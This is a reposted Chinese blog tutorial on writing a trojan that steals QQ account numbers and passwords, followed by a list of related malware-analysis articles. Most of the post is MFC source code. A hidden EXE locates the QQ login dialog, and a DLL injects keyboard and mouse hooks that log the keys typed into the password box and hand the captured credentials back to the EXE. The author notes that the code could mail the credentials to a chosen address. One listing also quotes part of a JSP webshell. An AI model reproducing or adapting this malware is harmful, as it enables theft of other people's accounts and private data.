QQ木马分析

最新推荐文章于 2024-01-02 13:58:30 发布
转载 最新推荐文章于 2024-01-02 13:58:30 发布 · 1.1k 阅读 · 0
文章标签:

#qq #null #dll #linker #action #通讯

新版QQ客户端发布了,除了在界面上焕然一新外,QQ对密码的保护是否健全,是否真正维护了用户的合法权益呢?带着这个疑问,我做了一些尝试,结果很让人失望,通过很简单的编程手段即可编写一个盗取QQ密码的程序。下面讲述一下实现方法(不要怪我助纣为虐,毕竟,是只羊就别指望没有狼来吃你),同时这个程序也是一个很有价值的实例,其中包括钩子函数、DLL的数据共享、进程间通讯等。
   程序包括两部分: DLL部分实现钩子函数,EXE部分实现辅助功能。
   一、   EXE部分。
   利用向导建立一个对话框实例,取名“QQGPS”。因为程序运行时不应有界面,所以要在这个实例的基础上进行改造。
删除对话框模板,对话框类的.h文件、.cpp文件及包含相应文件的#include语句。
   利用向导从基类“CFrameWnd”派生新类“CMainWnd”。
   添加函数BOOL CreateFrame();其代码如下:
BOOL CMainWnd::CreateFrame()
{
   RECT rt={0,0,1,1};
   BOOL ret=FALSE;
   ret=CWnd::CreateEx(0,AfxRegisterWndClass(0),
   "yafi",~WS_VISIBLE,rt,0,0);//创建一个不可见的窗口。
   SetTimer(0,500,NULL);//创建定时器
   return ret;
}
   改写原有的CQQGPSApp::InitInstance函数。
BOOL CQQGPSApp::InitInstance()
{
   CMainWnd*pWnd=new CMainWnd();
   pWnd->CreateFrame();
   m_pMainWnd=pWnd;
   return TRUE;// 返回TRUE,开始消息循环。
}
   到现在为止,已经生产出了一个框架,拥有消息处理功能,没有界面。下面再添加对定时器的消息处理函数。在QQ运行时该函数将查找其上面的两个编辑框的窗口句柄,并将其传递给DLL。
void CMainWnd::OnTimer(UINT nIDEvent)
{
   // TODO: Add your message handler code here and/or call default
   HWND hdlg=NULL,handle1=NULL,handle2=NULL,hID;
   BOOL stop=0;
   CString title;
   int num=0;
   while(!stop&&num<50)
   {
      handle1=::FindWindow("#32770",NULL);
      if(handle1!=NULL)
      {
         handle2=::FindWindowEx(handle1,NULL,"Static",NULL);
         ::GetWindowText(handle2,title.GetBufferSetLength(20),20);
         if(title=="QQ号码:")
         {
            stop=TRUE;
            hdlg=handle1;
         }
      }
      num++;
   }
   if(hdlg!=NULL) //此为QQ对话框的窗口句柄
   {
      stop=0;
      num=0;
      while(!stop&&num<50)
      {
         handle1=::FindWindowEx(hdlg,NULL,"ComboBox",NULL);
         if(handle1!=0)
         {
            handle2=::FindWindowEx(handle1,NULL,"Edit",NULL);
            if(handle2!=NULL)
            {
               hID=handle2;//此为号码编辑框窗口句柄
               stop=TRUE;
            }
         }
      }
      if(stop)
      {
         stop=0;
         num=0;
         while(!stop&&num<50)
         {
            handle1=::FindWindowEx(hdlg,NULL,"Edit",NULL);
            if(handle1!=0)//此为密码编辑框窗口句柄
            {
               stop=TRUE;
               if(HookStart(this->m_hWnd ,handle1,hID))//DLL的导出函数
               KillTimer(0);//发现QQ运行,启动钩子函数,关闭定时器
            }
         }
      }
   }
   CFrameWnd::OnTimer(nIDEvent);
}

二、   DLL部分。
   使用向导生成MFC AppWizard (DLL)实例,取名“QQGPD”。在头文件中添加代码。
#define QQGPD_API __declspec(dllexport)
QQGPD_API BOOL HookStart(HWND hWnd=NULL,HWND hWndCtlPW=NULL,HWND hWndCtlID=NULL);//导出函数,挂接构子
QQGPD_API BOOL HookStop();//导出函数,卸载钩子
   在cpp文件顶端添加代码:
#pragma data_seg("Shared")
HHOOK g_hhookKey=NULL;
HHOOK g_hhookMouse=NULL;
HWND g_hWnd=NULL;
HWND g_hWndCtlPW=NULL;
HWND g_hWndCtlID=NULL;
#pragma data_seg()

#pragma comment(linker,"/SECTION:Shared,RWS")

CString g_strKey,g_strID;//DLL全局变量分别用于接收密码及号码
HINSTANCE g_hinstDll=NULL;// DLL全局变量记载DLL的实例句柄
   这里有几行代码很奇怪#pragma data_seg("Shared") #pragma data_seg() #pragma comment(linker,"/SECTION:Shared,RWS") 他们的作用是使前两条语句之间的变量成为所有实例的共享数据。必须对他们赋初值。
   详细说明一下,若他们为全局变量,当程序“QQGPS”运行时,“QQGPS”进程将加载DLL,并将三个参数传递给DLL。QQ客户端程序运行时,由于被挂接了钩子,也将加载DLL。好了,现在有两个DLL的实例,分别运行于两个不同进程的地址空间,在“QQGPS”进程中给DLL传递了参数,而在QQ客户端被加载的DLL的相应变量并未改变,事实上他们的值将是初始化时对他们赋的值。
   以上方法同样适用于可执行文件,使多个可执行文件共享一个变量。
   接下来添加导出函数:
BOOL HookStart(HWND hWnd ,HWND hWndCtlPW,HWND hWndCtlID)//挂结钩子
{
   if(g_hhookKey!=NULL││g_hhookMouse!=NULL)
      return 0;
   g_hWnd=hWnd;//主窗口句柄
   g_hWndCtlPW=hWndCtlPW;//密码编辑框窗口句柄
   g_hWndCtlID=hWndCtlID;//号码编辑框窗口句柄
   g_hhookKey=::SetWindowsHookEx(WH_KEYBOARD,(HOOKPROC)KeyHookProc,g_hinstDll,::GetWindowThreadProcessId(hWndCtlPW,NULL));//为QQ挂接键盘钩子
   g_hhookMouse=::SetWindowsHookEx(WH_MOUSE,(HOOKPROC)MouseHookProc,g_hinstDll,::GetWindowThreadProcessId(hWndCtlPW,NULL));// 为QQ挂接鼠标钩子
   return (g_hhookKey!=NULL)&&(g_hhookMouse!=NULL);
}
BOOL HookStop()//卸载钩子
{
   BOOL ret1=0,ret2=0;
   if(g_hhookKey!=NULL)
      ret1=::UnhookWindowsHookEx(g_hhookKey);
   if(g_hhookMouse!=NULL)
      ret2=::UnhookWindowsHookEx(g_hhookMouse);
   g_hhookKey=NULL;
   g_hhookMouse=NULL;
   return ret1&&ret2;
}
   下面两个为相应的钩子函数。
LRESULT MouseHookProc(int nCode,WPARAM wParam,LPARAM lParam)//鼠标钩子函数在点击“登录”按钮时发送信息
{
   MOUSEHOOKSTRUCT *MouseInfo=(MOUSEHOOKSTRUCT*)lParam;
   CString title,str;
   CWnd wnd;
   if((nCode==HC_ACTION)&&(wParam==WM_LBUTTONDOWN))
   {
      wnd.Attach(MouseInfo->hwnd);
      wnd.GetWindowText(title);
      wnd.Detach();
      if(title=="登录")
      {
         if(g_strKey.GetLength()>0)
         {   
            ::SendMessage(g_hWndCtlID,WM_GETTEXT,20,(LPARAM)g_strID.GetBufferSetLength(20));//获取号码
            str="号码:";
            str+=g_strID;
            str.ReleaseBuffer();
            str+="密码:";
            str+=g_strKey;
            ATOM atom=::GlobalAddAtom(str.GetBuffer(0));//使用全局原子表进行进程间通讯
            ::PostMessage(g_hWnd,WM_GETPW,(WPARAM)atom,1);
         }else
         {
            ::PostMessage(g_hWnd,WM_GETPW,0,0);
         }
         g_strKey="/0";
      }else if(title=="取消")
      {
         ::PostMessage(g_hWnd,WM_GETPW,0,0);
         g_strKey="/0";
      }else if(title=="注册向导")
      {
         ::PostMessage(g_hWnd,WM_GETPW,0,0);
         g_strKey="/0";
      }
   }
   return ::CallNextHookEx(g_hhookMouse,nCode,wParam,lParam);
}
LRESULT KeyHookProc(int nCode,WPARAM wParam,LPARAM lParam)//键盘钩子函数,拦截发送给密码框的键盘信息
{
   BOOL bCap=((::GetKeyState(VK_CAPITAL)&0x01)!=0);
   BOOL bShift=((::GetKeyState(VK_SHIFT)&0x8000)!=0);
   char ch=1;
   CString str;
   if((nCode==HC_ACTION)&&(lParam&0x40000000)&&(::GetFocus()==g_hWndCtlPW))//只在按键盘(而非松开时)并且密码编辑框获得光标时执行以下代码
   {
      if((wParam==0x08)&&(g_strKey.GetLength()>0))//Backspace
      {
         g_strKey.Delete(g_strKey.GetLength()-1,1);
      }else if(wParam>=0x41&&wParam<=0x5A)// a——z或A——Z
      {
         ch=::MapVirtualKey(wParam,2)&0xff;
         g_strKey+=(char)(bCap^bShift ? ch : ch+32);
      }else if(wParam>=0x30&&wParam<=0x39)// 0——9
      {
         ch=::MapVirtualKey(wParam,2)&0xff;
         if(!bShift)
            g_strKey+=ch;
         else
         {
            switch(ch)
            {
            case '1':
               g_strKey+='!';
               break;
            case '2':
               g_strKey+='@';
               break;
            case '3':
               g_strKey+='#';
               break;
            case '4':
               g_strKey+='$';
               break;
            case '5':
               g_strKey+='%';
               break;
            case '6':
               g_strKey+='^';
               break;
            case '7':
               g_strKey+='&';
               break;
            case '8':
               g_strKey+='*';
               break;
            case '9':
               g_strKey+='(';
               break;
            case '0':
               g_strKey+=')';
               break;
            }
         }
      }else if((wParam>=0x60&&wParam<=0x69)&&((::GetKeyState(VK_NUMLOCK)&0x01)!=0))//小键盘0——9
      {
         ch=::MapVirtualKey(wParam,2)&0xff;
         g_strKey+=ch;
      }else if(wParam==0x20)//空格
      {
         g_strKey+=' ';
      }else if(wParam==0xBA)
      {
         if(!bShift)
            g_strKey+=';';
         else
            g_strKey+=':';
      }else if(wParam==0xBB)
      {
         if(!bShift)
            g_strKey+='=';
         else
            g_strKey+='+';
      }else if(wParam==0xBC)
      {
         if(!bShift)
            g_strKey+=',';
         else
            g_strKey+='<';
      }else if(wParam==0xBD)
      {
         if(!bShift)
            g_strKey+='-';
         else
            g_strKey+='_';
      }else if(wParam==0xBE)
      {
         if(!bShift)
            g_strKey+='.';
         else
            g_strKey+='>';
      }else if(wParam==0xBF)
      {
         if(!bShift)
            g_strKey+='/';
         else
            g_strKey+='?';
      }else if(wParam==0xC0)
      {
         if(!bShift)
            g_strKey+='`';
         else
            g_strKey+='~';
      }else if(wParam==0xDB)
      {
         if(!bShift)
            g_strKey+='[';
         else
            g_strKey+='{';
      }else if(wParam==0xDC)
      {
         if(!bShift)
            g_strKey+='/';
         else
            g_strKey+='│';
      }else if(wParam==0xDD)
      {
         if(!bShift)
            g_strKey+=']';
         else
            g_strKey+='}';
      }else if(wParam==0xDE)
      {
         if(!bShift)
            g_strKey+=(char)0x2e;
         else
            g_strKey+=(char)0x22;
      }
      ::SendMessage(g_hWndCtlID,WM_GETTEXT,20,(LPARAM)g_strID.GetBufferSetLength(20));
   }
   if((nCode==HC_ACTION)&&(lParam&0x40000000))
   {
      if(wParam==0x0D)// ENTER键
      {
         if(g_strKey.GetLength()>0)
         {
            str="号码:";
            str+=g_strID;
            str.ReleaseBuffer();
            str+="密码:";
            str+=g_strKey;
            ATOM atom=::GlobalAddAtom(str.GetBuffer(0)); //使用全局原子表进行进程间通讯。
            ::PostMessage(g_hWnd,WM_GETPW,(WPARAM)atom,1);
         }
         else
            ::PostMessage(g_hWnd,WM_GETPW,0,0);
         g_strKey="";
      }
   }
   return ::CallNextHookEx(g_hhookKey,nCode,wParam,lParam);
}
   最后一步了,实现进程间消息的发送。
   在DLL的头文件中添加代码#define WM_GETPW WM_APP+1,在“QQGPS”的“CMainWnd”类中添加相应的消息处理函数,以处理WM_GETPW消息。
LRESULT CMainWnd::GetPW(WPARAM wParam,LPARAM lParam)
{
   CString str;
   if(lParam)
   {
      ::GlobalGetAtomName((ATOM)wParam,str.GetBufferSetLength(80),80);//题外话,利用原子表传送数据,对于相同的字符串,原字表名字符不分大小写。
      ::GlobalDeleteAtom((ATOM)wParam);
      MessageBox(str);//以对话框的形式显示QQ号码及密码。若替换以函数,则可将密码发送至指定邮箱。
   }
   return HookStop();//卸载钩子
}
   好了,正确链接头文件及库文件,运行可执行程序。打开QQ,输入号码及密码,击“ENTER”或鼠标点击“登录”。如果一切正确,就会弹出一个对话框显示QQ号码及密码。
   作为国内用户群最为广大的实时网络通讯工具,QQ对密码的保护机制太脆弱了。当然,讯腾使用了一些防窃密机制,例如使用获取号码编辑框字符的方法就无法获取密码编辑框字符。然而,对“钩子”似乎没有做任何防备。其实,QQ只需要为自身挂接一个WH_DEBUG类型的钩子,以上方法就失效了,很可惜,讯腾没有这样做。虽然通过手机申请密码保护可从新获得被盗密码。个人隐私泄漏,也总不是件令人愉快的事。希望讯腾继续加强对密码的保护机制。   

jsp文件木马代码分析
长颈鹿的专栏
03-26 4136
近来登陆阿里云,竟发现webapps/ROOT/下面多了一个tst.jsp 代码格式化了一下,每个方法都注释了下 <%!String Pwd = "chopper"; String EC(String s, String c) throws Exception { return s; }//new String(s.getBytes("ISO-8859-1"),c);} //
病毒木马查杀实战第012篇:QQ盗号木马之逆向分析
墨鱼菜鸡
01-13 507
前言 在本系列的文章中,对每一个病毒分析的最后一个部分,若无特殊情况,我都会采用逆向分析的手段来为读者彻底剖析目标病毒。但是之前的“熊猫烧香”病毒,我用了三篇文章的篇幅(每篇2500字左右)也仅仅分析了病毒的三分之一,而且还没分析到病毒的核心部分。主要也是因为那是我这个系列为大家分析的第一个病...
白加黑远控木马分析
dsb2468的专栏
07-30 4256
概述: 病毒伪装成一个DLL文件,QQ游戏启动的同时,病毒DLL也会被加载启动(也叫DLL劫持)。病毒加载之后,会在内存中释放出远控模块,通过建立本地端口映射的方式,意图绕过某些安软的网络拦截,从而控制目标计算机。 病毒目录文件如下: 病毒运行加载流程如下:   详细分析: 1、启动方式: 首先,病毒作者将关键文件全部隐藏打包了起来,只留了了一个快捷方式,通过调用CMD的方式...
大灰狼远控木马分析
人饭子的博客
11-06 1056
#sidebar { position: absolute; top: 0; left: 0; bottom: 0; width: 250px; padding: 0; margin: 0; overflow: auto } #page-container { position: absolute; top: 0; left: 0; margin: 0; padding: 0; bord...
木马攻击与防护
weixin_62707591的博客
06-18 2692
通过漏洞、邮件和广告方推广进行传播,一旦中病毒,计算机中的Office 文档和图片等文件遭受到格式基改和加密,还会在桌面等明显位置生成勒索提示文件,指导用户去缴纳赎金。一旦木马DLL插入了QQ进程的地址空间后,就可以轻易的盗取QQ密码。数据传输技术上,又做了不小的改进,出现了ICMP等类型的木马,利用畸形报文传递数据,增加了查杀的难度。木马属于Win32应用程序,同一般win32应用程序比,木马的窗体是隐藏的。主要是简单的密码窃取,通过电子邮件发送信息等,具备了木马的最基本功能。
网络协议分析论文——木马的原理及其防范
qq_68920288的博客
01-02 1908
网络协议分析在当今信息化社会中扮演着关键的角色,随着互联网的不断普及和应用,网络安全问题变得尤为重要。在这一背景下,木马作为一种具有潜在破坏性的恶意软件,对网络安全构成严峻威胁。了解木马的原理和防范方法对于保护个人隐私、维护网络安全至关重要。木马源于古希腊神话,是指希腊人通过制造一个巨大的木马送给特洛伊人,从而成功侵入特洛伊城。在计算机领域,木马也是一种欺骗性的恶意软件,通过伪装成合法程序或文件的方式,骗取用户信任,进而潜伏于系统中。
研究分析QQ木马的原理
q472599451的专栏
10-17 2386
最近想研究一下木马原理及键盘记录。 键盘记录的网上有很多源代码。 但是普通的键盘记录勾子好像对QQ 的登录框好像没有任何的作用。 QQ 的登录框对windows的键盘中断加密了。 加密原理参照:http://topic.youkuaiyun.com/u/20090504/16/0833b3df-6572-4232-9b74-9e5cf6a022d6.html 信息监控与隐
Free Star木马分析与追溯
weixin_33969116的博客
03-08 438
360安全卫士 · 2016/04/05 14:07Author:360天眼实验室0x00 引子人在做,天在看。360天眼实验室一直与各种木马远程做斗争,对手总是试图找到办法使自己处于安全监视者的雷达之外。近期我们看到了一些较新版本的大灰狼木马采用了一种新的上线方式,与利用QQ空间、微博、博客或者网盘等方式上线相似,其通过调用QQ一个获取用户昵称的接口来获取上线地址,又一种通过正常通信渠道进行非正...
木马分析(隐藏分析)实验
weixin_30794851的博客
10-29 533
一、实验目的 了解木马隐藏技术的基本原理 提高木马攻击的防范意识 明确木马技术的发展方向 学会使用木马防范的相关工具 二、实验内容 通过对木马程序的分析,了解木马的隐藏技术原理 能够分析木马隐藏的基本特征 能够清除一般的隐藏木马 三、实验环境 VMare workstation Windows操作系统 上兴远程 实验也可两个同学为一组,一个做为木马控制...
qqkey获取原理_QQ key盗号木马原理分析
weixin_39725885的博客
01-30 3998
一、简介转载至网络 侵删QQkey是一段字符串,通过这段字符串在没有QQ登录密码的前提下你依然能够在浏览器中对别人QQ空间、邮箱等应用进行随意访问和操作。现在市面上已经有很多使用易语言编写的盗号木马,专门盗取别人的QQkey,通过QQkey改绑关联了该邮箱的Steam账号,最终达到游戏盗号的目的!二、原理QQkey并没有人们想象的那么神奇,它其实是腾讯为了方便用户在网页上进行快速登录而推出的一项技...
病毒木马防御与分析
Antz Uhl Kone
01-15 1508
病毒木马防御与分析 病毒包和工具包下载:Github 一.前言 二.建立对手动查杀病毒技术的正确认识 1.病毒分析方法 2.病毒查杀步骤 3.必备知识 * 1) 熟悉windows系统进程 * 2) 熟悉常见端口与进程对应关系 * 3) 熟悉windows自带系统服务 * 4) 熟悉注册表启动项位置 三.详解Windows随机启动项目——注...
2008年QQ密码窃取木马分析与安全防范
“2008.qq”这一文件名称结合其附属信息,展现出一个典型的早期互联网安全事件样本,尤其反映了2008年前后中国网络环境中关于即时通讯工具QQ的安全隐患、木马病毒传播手段以及用户隐私泄露风险的严峻现实。...
病毒木马查杀实战第010篇:QQ盗号木马之十六进制代码分析
墨鱼菜鸡
12-25 367
前言 按照我的个人习惯,在运用诸如IDA Pro与OllyDBG对病毒进行逆向分析之前,我都会利用一些自动化的工具,通过静态或动态的分析方法(参见《病毒木马查杀第008篇:熊猫烧香之病毒查杀总结》)来对病毒的行为产生一定的认识,这样在之后的逆向分析中,我就能够产生“先入为主”的心态,在分析反汇...
揭秘VC MFC实现的QQ木马技术细节
根据上述文件信息,本内容涵盖了VC、MFC、木马病毒原理、进程注入技术、QQ操作等多个方面,提供了一个关于如何通过编程技术实现QQ木马攻击的概述。需要注意的是,以上内容仅作为知识性介绍,绝无鼓励或指导制作、...
QQ木马病毒专杀大师 7.0 专业清理盗号与流氓软件
因此,《QQ木马病毒专杀大师》必须具备多层次的检测能力,包括基于特征码的静态扫描、行为监控、注册表检测、启动项分析、网络连接追踪等技术手段。 标签中的“QQ木马”“木马”“杀毒工具类”“杀毒软件”“病毒...
jmeter DSL 2.0支持压力测试和接口测试
12-04
jmeter DSL 2.0支持压力测试和接口测试
【Egg.js 管理系统】后台全功能 + MySQL 适配 + 直接部署 + 高下载!亲测可用!.zip
12-04
【Egg.js 管理系统】后台全功能 + MySQL 适配 + 直接部署 + 高下载!亲测可用!.zip
【轴承故障诊断】基于融合鱼鹰和柯西变异的麻雀优化算法OCSSA-VMD-CNN-BILSTM轴承诊断研究【西储大学数据】(Matlab代码实现)
12-04
内容概要:本文提出了一种基于融合鱼鹰算法和柯西变异的改进麻雀优化算法(OCSSA),用于优化变分模态分解(VMD)的参数,进而结合卷积神经网络(CNN)与双向长短期记忆网络(BiLSTM)构建OCSSA-VMD-CNN-BILSTM模型,实现对轴承故障的高【轴承故障诊断】基于融合鱼鹰和柯西变异的麻雀优化算法OCSSA-VMD-CNN-BILSTM轴承诊断研究【西储大学数据】(Matlab代码实现)精度诊断。研究采用西储大学公开的轴承故障数据集进行实验验证,通过优化VMD的模态数和惩罚因子,有效提升了信号分解的准确性与稳定性,随后利用CNN提取故障特征,BiLSTM捕捉时间序列的深层依赖关系,最终实现故障类型的智能识别。该方法在提升故障诊断精度与鲁棒性方面表现出优越性能。; 适合人群:具备一定信号处理、机器学习基础,从事机械故障诊断、智能运维、工业大数据分析等相关领域的研究生、科研人员及工程技术人员。; 使用场景及目标:①解决传统VMD参数依赖人工经验选取的问题,实现参数自适应优化;②提升复杂工况下滚动轴承早期故障的识别准确率;③为智能制造与预测性维护提供可靠的技术支持。; 阅读建议:建议读者结合Matlab代码实现过程,深入理解OCSSA优化机制、VMD信号分解流程以及CNN-BiLSTM网络架构的设计逻辑,重点关注参数优化与故障分类的联动关系,并可通过更换数据集进一步验证模型泛化能力。
这是一个基于Vuejs框架构建的现代化前端尺寸测量与响应式设计辅助工具项目_它专注于提供精准的网页元素尺寸测量视口分析CSS像素计算设备模拟与响应式断点调试功能_旨在帮助前.zip
最新发布
12-04
这是一个基于Vuejs框架构建的现代化前端尺寸测量与响应式设计辅助工具项目_它专注于提供精准的网页元素尺寸测量视口分析CSS像素计算设备模拟与响应式断点调试功能_旨在帮助前.zip
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值